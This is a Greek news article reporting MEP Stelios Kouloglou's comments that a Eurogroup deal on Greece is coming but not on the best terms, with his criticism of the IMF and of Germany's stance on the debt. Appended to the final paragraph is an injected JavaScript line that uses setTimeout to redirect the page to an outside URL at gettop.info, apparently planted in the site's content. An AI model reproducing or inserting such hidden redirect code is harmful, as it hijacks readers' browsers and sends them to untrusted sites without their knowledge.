Κούλογλου: Θα υπάρξει συμφωνία, αλλά όχι με τους καλύτερους όρους για την Ελλάδα

0
3

 

Βέβαιος ότι θα υπάρξει συμφωνία για την Ελλάδα στο επικείμενο Eurogroup, εμφανίζεται ο ευρωβουλευτής του ΣΥΡΙΖΑ Στέλιος Κούλογλου, μιλώντας στον ραδιοφωνικό σταθμό του ΑΠΕ-ΜΠΕ «Πρακτορείο 104,9 Fm». Σημειώνει, ωστόσο, ότι εκείνο που πρέπει να επιτευθεί, είναι η συμφωνία αυτή να διασφαλίζει για την ελληνική πλευρά τους καλύτερους όρους, επειδή «αυτό δεν είναι ακόμα δεδομένο».

«Όπως ξέρουμε, το κλίμα στο Ευρωπαϊκό Κοινοβούλιο, αλλά ακόμα και στην Κομισιόν, είναι πολύ πιο θετικό απ? ό,τι ήταν πέρσι. Υπάρχει διάθεση για συμφωνία και στάση μετριοπαθής, συμβιβαστική εκ μέρους της Κομισιόν. Οι δύσκολοι παράγοντες είναι το Διεθνές Νομισματικό Ταμείο, το οποίο ζητάει μια σειρά από πράγματα, πολλές φορές παράλογα και εξωφρενικά, σε ό,τι αφορά τις εργασιακές σχέσεις και μετά είναι το Βερολίνο, το οποίο δεν θέλει να συζητήσει καθόλου για το χρέος, πράγμα το οποίο, όμως, θέλει το ΔΝΤ» σημειώνει ο κ. Κούλογλου, προσθέτοντας πως, κατόπιν τούτων, η φράση του ταιριάζει στην κατάσταση για το ελληνικό πρόβλημα, είναι «δύο γάιδαροι μαλώνανε σε ξένον αχυρώνα».

Ο ευρωβουλευτής αναγνωρίζει ότι για τη σημερινή κυβέρνηση, όσο και για τις προηγούμενες, ήταν πολύ δύσκολο να περάσουν επώδυνα μέτρα, «αλλά το κάνανε» και συμπεραίνει: «Επομένως, αν θέλει η Γερμανία να υπάρξουν κάποιου είδους στοιχειώδεις σχέσεις συνεργασίας ανάμεσα στα κράτη-μέλη της Ευρώπης, θα πρέπει κι αυτή, κάποια στιγμή, να υποχρεωθεί να πει την αλήθεια στους δικούς της πολίτες. Ότι, αντίθετα με αυτά που λέει ο κ. Σόιμπλε, η Ελλάδα έχει κάνει τις πιο δραστικές αλλαγές στην ιστορία της ανθρωπότητας -χώρα σε καιρό ειρήνης- και θα πρέπει και η άλλη πλευρά να κάνει κάποιες κινήσεις».

Σε άλλη περίπτωση, όπως διευκρινίζει, «αν δεν κάνει κινήσεις, τότε θα πάμε όχι απλά σε χειροτέρευση της κατάστασης στην Ελλάδα, αλλά σε μία ανοιχτή πλέον κρίση στην Ευρωζώνη και την Ευρωπαϊκή Ένωση». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here